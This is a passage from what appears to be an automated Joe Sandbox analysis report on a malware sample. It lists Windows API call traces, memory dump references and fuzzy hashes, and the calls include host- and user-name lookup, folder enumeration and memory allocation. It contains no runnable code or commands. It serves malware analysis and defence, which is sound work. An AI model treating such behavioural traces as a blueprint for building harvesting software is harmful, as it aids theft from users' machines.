                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$lstrlen$lstrcat$memcmp
                                                                                                • String ID:
                                                                                                • API String ID: 3457870978-0
                                                                                                • Opcode ID: d718eb297d2c1fa87a7bbca561b5cbf439e73f9ad7ab37fce845a7d1a2079457
                                                                                                • Instruction ID: 2255bc3e1aae02863dcd83073914f46634cd1c5da6bc7bd4c07d15e0a17c61c2
                                                                                                • Opcode Fuzzy Hash: d718eb297d2c1fa87a7bbca561b5cbf439e73f9ad7ab37fce845a7d1a2079457
                                                                                                • Instruction Fuzzy Hash: BAE14672A111189BCB04FBA1DD66EEE7339AF14314F40459EF10672095EF387B98CB6A
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040B13A
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040B14E
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 2500673778-0
                                                                                                • Opcode ID: 28efb8b6764b4714764abcffd5bb701b7200d1696dc845e6d1e24e81cabdc56f
                                                                                                • Instruction ID: b118e420acb74f1bad9678fc0f4fca3608bd39bb9752133bd9c886ddfd0b535b
                                                                                                • Opcode Fuzzy Hash: 28efb8b6764b4714764abcffd5bb701b7200d1696dc845e6d1e24e81cabdc56f
                                                                                                • Instruction Fuzzy Hash: A8916672A151089BCB04FBA1DC66DEE7339AF14314F40456FF10663195EF387A98CB6A
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040B3FE
                                                                                                • lstrlenA.KERNEL32(00000000), ref: 0040B412
                                                                                                  • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$lstrlen$lstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 2500673778-0
                                                                                                • Opcode ID: 527ce95fccc19ec0b7c1c15eb4c668e5f89ac8bb418c506540bb58863ee12996
                                                                                                • Instruction ID: df39fec182a976cf14ea74314fd1cc2d61bc45c83f0c5b543270b10835f39725
                                                                                                • Opcode Fuzzy Hash: 527ce95fccc19ec0b7c1c15eb4c668e5f89ac8bb418c506540bb58863ee12996
                                                                                                • Instruction Fuzzy Hash: B4715271A111089BCB04FBA1DCA6DEE733AAF14314F40456FF50267195EF387A58CBAA
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNEL32(00406E0E,00406E0E,00003000,00000040), ref: 00406756
                                                                                                • VirtualAlloc.KERNEL32(00000000,00406E0E,00003000,00000040), ref: 004067A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AllocVirtual
                                                                                                • String ID:
                                                                                                • API String ID: 4275171209-0
                                                                                                • Opcode ID: bff2cd72ca51f604b8cae6ffaccc6788292cd5c635fa360249288f38c6295135
                                                                                                • Instruction ID: 1e55e6aee22da07579867dcc14e26085db0c1923c06382e7ddd462ac09197dec
                                                                                                • Opcode Fuzzy Hash: bff2cd72ca51f604b8cae6ffaccc6788292cd5c635fa360249288f38c6295135
                                                                                                • Instruction Fuzzy Hash: 6041D474A00209EFCB54CF58C494BADBBB1FF44314F1486A9E949AB385D735EA91CF84
                                                                                                APIs
                                                                                                • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004,?,?,?,0040114E,?,?,00416CBC), ref: 004010B3
                                                                                                • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0,?,?,?,0040114E,?,?,00416CBC), ref: 004010F7
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Virtual$AllocFree
                                                                                                • String ID:
                                                                                                • API String ID: 2087232378-0
                                                                                                • Opcode ID: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
                                                                                                • Instruction ID: a2dd58c0224e163af538114889642f36ecbeef109afe3d50a53e5cb7169f74e2
                                                                                                • Opcode Fuzzy Hash: 4ccb3339a7f6084aabfd7cf6baf65b53e8baa26228d10618978cb16090ab9117
                                                                                                • Instruction Fuzzy Hash: 74F0E2B1A42208BBE7149AA4AC59FAFB799E705B04F300459F540E3290D571AF00DAA4
                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: e4e61478786545620c941bfdebde28148ee30d40bfd2ffe50c48c5d67029bfc3
                                                                                                • Instruction ID: 622f2f336d6b1c39152e8ed1c6124f6159486e78b27092244718ebba6cc61b65
                                                                                                • Opcode Fuzzy Hash: e4e61478786545620c941bfdebde28148ee30d40bfd2ffe50c48c5d67029bfc3
                                                                                                • Instruction Fuzzy Hash: 7EF01C70D0520CEBCB00EF94D4496DDBB75EB00324F10819AE82967280DB385B96CB89
                                                                                                APIs
                                                                                                • SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FolderPathlstrcpy
                                                                                                • String ID:
                                                                                                • API String ID: 1699248803-0
                                                                                                • Opcode ID: 6d5c486f1174f401a7d52f4a33802c5c22497fe214560b0ce90e5b19e21db00a
                                                                                                • Instruction ID: e79076dc3140f9edc5567924fb21932d6a0b2d79ef3805787682db2ce51b8011
                                                                                                • Opcode Fuzzy Hash: 6d5c486f1174f401a7d52f4a33802c5c22497fe214560b0ce90e5b19e21db00a
                                                                                                • Instruction Fuzzy Hash: 92E0127194434C6BDB51DB50CC96FDD776D9B44B11F004295BA0C5B1C0DE70AB858B95
                                                                                                APIs
                                                                                                  • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                                                                  • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                                                                  • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                                                                  • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                                                                                  • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                                                                  • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                                                                                • ExitProcess.KERNEL32 ref: 004011C6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Heap$Process$AllocName$ComputerExitUser
                                                                                                • String ID:
                                                                                                • API String ID: 1004333139-0
                                                                                                • Opcode ID: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                                                                                • Instruction ID: bcf4cddec8ba3652d3daa4bfa83a7295d39fc22ea0064294e7a9f420d8d9705c
                                                                                                • Opcode Fuzzy Hash: dcd40bd9b7440eb8545f2694ec48fb4b44b4fea9788a6d776e7c72e508f0613a
                                                                                                • Instruction Fuzzy Hash: E1E0ECB5D5820152DB1473B6AC06B5B339D5B1934EF04142FF90896252FE29F8404169
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: free
                                                                                                • String ID:
                                                                                                • API String ID: 1294909896-0
                                                                                                • Opcode ID: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
                                                                                                • Instruction ID: a929929d55870eb2e3dfc3d9b08de53e37bb6c9da6c43a06ed963554b33c57a4
                                                                                                • Opcode Fuzzy Hash: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
                                                                                                • Instruction Fuzzy Hash: A5F090B1554708CFDB006FA8E8C52153BA4F746219F5840BAE8150B201D735D5E1CB91
                                                                                                APIs
                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000020,004108B9,?,?), ref: 00409918
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ??2@
                                                                                                • String ID:
                                                                                                • API String ID: 1033339047-0
                                                                                                • Opcode ID: 3912ae89892860816b228f59aaf213fb868172a610b0e449912dea322eeca367
                                                                                                • Instruction ID: 7a81cf42230454625edcc1d807e760a9f48c6c1e1b7ee97c20b10c4417f739aa
                                                                                                • Opcode Fuzzy Hash: 3912ae89892860816b228f59aaf213fb868172a610b0e449912dea322eeca367
                                                                                                • Instruction Fuzzy Hash: F3F054B4D00208FBDB00EFA5C846B9EBBB49B08304F1085A9F905A7381E674AB14CB95
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2803490479-0
                                                                                                • Opcode ID: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
                                                                                                • Instruction ID: 08a60fc229ca929b4850671bf03eed3452f9cad2ea52f9bb94d0a5c68b8f0e05
                                                                                                • Opcode Fuzzy Hash: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
                                                                                                • Instruction Fuzzy Hash: 68F039B0C4830A9FCB009FA5DAC5A0DBBE8EB84258F14C46DE8988F710D334E580CB51
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 00413B1C
                                                                                                • FindFirstFileA.KERNEL32(?,?), ref: 00413B33
                                                                                                • lstrcatA.KERNEL32(?,?,?,00000104,?,00000104), ref: 00413B85
                                                                                                • StrCmpCA.SHLWAPI(?,00420F58), ref: 00413B97
                                                                                                • StrCmpCA.SHLWAPI(?,00420F5C), ref: 00413BAD
                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00413EB7
                                                                                                • FindClose.KERNEL32(000000FF), ref: 00413ECC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
